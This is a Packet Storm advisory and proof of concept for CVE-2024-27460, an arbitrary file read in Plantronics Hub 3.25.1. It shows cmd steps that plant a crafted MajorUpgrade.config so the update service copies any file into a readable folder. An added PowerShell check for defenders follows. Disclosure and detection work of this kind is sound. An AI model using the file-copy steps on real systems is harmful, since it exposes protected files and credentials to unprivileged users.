packetstorm | Alaa Kachouh, Farid Zerrouk | PACKETSTORM:178563
History: May 14, 2024 - 12:00 a.m.

Plantronics Hub 3.25.1 Arbitrary File Read

2024-05-14 00:00:00
Alaa Kachouh, Farid Zerrouk
packetstormsecurity.com
Tags: plantronics hub, arbitrary file read, cve-2024-27460, windows 10/11, exploit, vendor homepage, poc, deloitte belgium, mastercard, file copy, security advisory, plantronics spokes3g

AI Score: 7.4 High (Confidence: Low)

EPSS: 0.0004 Low (Percentile: 9.1%)

```
# Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read
# Date: 2024-05-10
# Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from Mastercard
# Vendor Homepage: https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895
# Version: Plantronics Hub for Windows version 3.25.1
# Tested on: Windows 10/11
# CVE : CVE-2024-27460

As a regular user, drop a file called "MajorUpgrade.config" inside the
"C:\ProgramData\Plantronics\Spokes3G" directory. The content of
MajorUpgrade.config should look like the following one-liner:
^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config

Replace <FULL-PATH-TO-YOUR-DESIRED-FILE> with the full path of the file to
read/copy (any file on the system). The desired file will be copied into
C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp

Steps to reproduce (POC):
- Open cmd.exe
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
- Desired file will be copied into C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp
```
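For defenders, an endpoint check built from the paths named above. This is an added example, not part of the original advisory or the vendor's tooling. It assumes the default install locations given in the advisory, treats the config as pipe-delimited based on the one-liner shown, and treats only SYSTEM and Administrators as trusted writers (an assumption to adjust per environment).

```powershell
# Added defensive check; directory and file names come from the advisory text.
$dropDir = 'C:\ProgramData\Plantronics\Spokes3G'
$trigger = Join-Path $dropDir 'MajorUpgrade.config'
$copyDir = 'C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp'

# 1. Is a MajorUpgrade.config present, who owns it, and which paths does it name?
if (Test-Path -LiteralPath $trigger) {
    $item  = Get-Item -LiteralPath $trigger
    $owner = (Get-Acl -LiteralPath $trigger).Owner
    Write-Output "FOUND $trigger owner=$owner lastWrite=$($item.LastWriteTime)"
    foreach ($line in Get-Content -LiteralPath $trigger) {
        # Assumption: fields are pipe-delimited, as in the advisory's one-liner.
        $line.Split('|') | Where-Object { $_.Trim() } |
            ForEach-Object { Write-Output "  field: $($_.Trim())" }
    }
} else {
    Write-Output "OK no MajorUpgrade.config in $dropDir"
}

# 2. Which principals other than SYSTEM and Administrators may create files there?
#    ACEs stored as generic rights are not decoded by this check.
if (Test-Path -LiteralPath $dropDir) {
    $trusted = 'S-1-5-18', 'S-1-5-32-544'   # LocalSystem, BUILTIN\Administrators
    $sidType = [System.Security.Principal.SecurityIdentifier]
    $create  = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
    $rules   = (Get-Acl -LiteralPath $dropDir).GetAccessRules($true, $true, $sidType)
    foreach ($ace in $rules) {
        $canCreate = ([int]$ace.FileSystemRights -band $create) -ne 0
        if ($ace.AccessControlType -eq 'Allow' -and $canCreate -and
            $trusted -notcontains $ace.IdentityReference.Value) {
            Write-Output "WRITABLE $dropDir by SID $($ace.IdentityReference.Value)"
        }
    }
}

# 3. Anything sitting in the copy destination deserves a look.
if (Test-Path -LiteralPath $copyDir) {
    Get-ChildItem -LiteralPath $copyDir -Force -File |
        Select-Object FullName, Length, LastWriteTime
}
```

A MajorUpgrade.config owned by a standard user, or one whose fields name files outside the Plantronics directories, is the condition to triage first.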
